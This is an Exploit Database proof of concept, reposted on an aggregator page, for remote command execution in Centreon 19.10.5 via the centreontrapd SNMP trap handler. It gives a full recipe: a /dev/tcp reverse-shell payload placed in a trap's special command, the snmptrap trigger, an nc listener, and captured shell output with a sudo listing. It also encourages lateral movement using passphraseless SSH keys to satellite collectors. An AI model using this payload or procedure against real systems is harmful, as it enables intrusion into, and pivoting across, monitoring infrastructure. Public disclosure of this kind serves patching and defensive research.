Centreon 19.10.5 – ‘centreontrapd’ Remote Command Execution

• Exploit Database
• 115 阅读

• 作者： Fabien AUNAY
  日期： 2020-01-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47978/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161

  # Exploit Title: Centreon 19.10.5 - &apos;centreontrapd&apos; Remote Command Execution # Date: 2020-01-29 # Exploit Author: Fabien AUNAY, Omri Baso # Vendor Homepage: https://www.centreon.com/ # Software Link: https://github.com/centreon/centreon # Version: 19.10.5 # Tested on: CentOS 7 # CVE : -   ########################################################################################################### Centreon 19.10.5 Remote Command Execution centreontrapd   Trusted by SMBs and Fortune 500 companies worldwide. An industry reference in IT Infrastructure monitoring for the enterprise. Counts 200,000+ ITOM users worldwide and an international community of software collaborators. Presence in Toronto and Luxembourg. Deployed in diverse sectors: - IT & telecommunication - Transportation - Government - Heath care - Retail - Utilities - Finance & Insurance - Aerospace & Defense - Manufacturing - etc.   It is possible to get a reverse shell with a snmp trap and gain a pivot inside distributed architecture.     Steps: Objective 1 : Create a SNMP trap or use linkDown OID with special command in action 3 Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy Objective 3 : Assign service trap relation Objective 4 : Get centreon id reverse shell   ###########################################################################################################   # Objective 1 : Create or use SNMP trap OID with special command in action 3 - Configuration>SNMP Traps   [+] Trap name * : linkDown [+] OID *: .1.3.6.1.6.3.1.1.5.3 [+] Special Command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121     # Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy - Configuration>Services>Services by host   [+] Description *: TRAP RCE [+] Linked with Hosts *: YOUR-LINKED-HOST [+] Check Command *: App-Monitoring-Centreon-Service-Dummy [+] DUMMYSTATUS: 0 [+] DUMMYOUTPUT: 0 [+] Passive Checks Enabled : YES [+] Is Volatile: YES [+] Service Trap Relation: Generic - linkDown     # Objective 3 : Assign service trap relation - Configuration>SNMP Traps - linkDown - Relations   [+] Linked services: YOUR-LINKED-HOST - SERVICE DESCRIPTION   reload Central Reload snmp config     # Objective 4 : Get centreon id reverse shell and think lateral   [+] Send your trap snmptrap -v2c -c public 127.0.0.1 &apos;&apos; .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2   TIP: centreontrapd logfile: 2020-01-29 02:52:33 - DEBUG - 340 - Reading trap.Current time: Wed Jan 29 02:52:33 2020 2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance).Will attempt to translate to a numerical OID 2020-01-29 02:52:33 - DEBUG - 340 - Translated to .1.3.6.1.2.1.1.3.0 2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0).Will attempt to translate to a numerical OID ... 2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service &apos;TRAP RCE&apos; for host &apos;supervision_IT&apos;. ... 2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command 2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121 ..     NOTE: Read the doc !!! https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen   The centreon id user shares configurations and instructions with satellite collectors trough SSH. No passphrase used. This allows you to move around the infrastructure after your RCE.     POC:   snmptrap -v2c -c public 127.0.0.1 &apos;&apos; .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2   nc -lvnp 12345 Ncat: Version 7.50 Ncat: Listening on :::12345 Ncat: Listening on 0.0.0.0:12345 Ncat: Connection from 127.0.0.1. Ncat: Connection from 127.0.0.1:38470. id uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker) sudo -l Matching Defaults entries for centreon on centreonlab: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty   User centreon may run the following commands on centreonlab: (root) NOPASSWD: /sbin/service centreontrapd start (root) NOPASSWD: /sbin/service centreontrapd stop (root) NOPASSWD: /sbin/service centreontrapd restart (root) NOPASSWD: /sbin/service centreontrapd reload (root) NOPASSWD: /usr/sbin/service centreontrapd start (root) NOPASSWD: /usr/sbin/service centreontrapd stop (root) NOPASSWD: /usr/sbin/service centreontrapd restart (root) NOPASSWD: /usr/sbin/service centreontrapd reload (root) NOPASSWD: /sbin/service centengine start (root) NOPASSWD: /sbin/service centengine stop (root) NOPASSWD: /sbin/service centengine restart (root) NOPASSWD: /sbin/service centengine reload (root) NOPASSWD: /usr/sbin/service centengine start (root) NOPASSWD: /usr/sbin/service centengine stop (root) NOPASSWD: /usr/sbin/service centengine restart (root) NOPASSWD: /usr/sbin/service centengine reload (root) NOPASSWD: /bin/systemctl start centengine (root) NOPASSWD: /bin/systemctl stop centengine (root) NOPASSWD: /bin/systemctl restart centengine (root) NOPASSWD: /bin/systemctl reload centengine (root) NOPASSWD: /usr/bin/systemctl start centengine (root) NOPASSWD: /usr/bin/systemctl stop centengine (root) NOPASSWD: /usr/bin/systemctl restart centengine (root) NOPASSWD: /usr/bin/systemctl reload centengine (root) NOPASSWD: /sbin/service cbd start (root) NOPASSWD: /sbin/service cbd stop (root) NOPASSWD: /sbin/service cbd restart (root) NOPASSWD: /sbin/service cbd reload (root) NOPASSWD: /usr/sbin/service cbd start (root) NOPASSWD: /usr/sbin/service cbd stop (root) NOPASSWD: /usr/sbin/service cbd restart (root) NOPASSWD: /usr/sbin/service cbd reload (root) NOPASSWD: /bin/systemctl start cbd (root) NOPASSWD: /bin/systemctl stop cbd (root) NOPASSWD: /bin/systemctl restart cbd (root) NOPASSWD: /bin/systemctl reload cbd (root) NOPASSWD: /usr/bin/systemctl start cbd (root) NOPASSWD: /usr/bin/systemctl stop cbd (root) NOPASSWD: /usr/bin/systemctl restart cbd (root) NOPASSWD: /usr/bin/systemctl reload cbd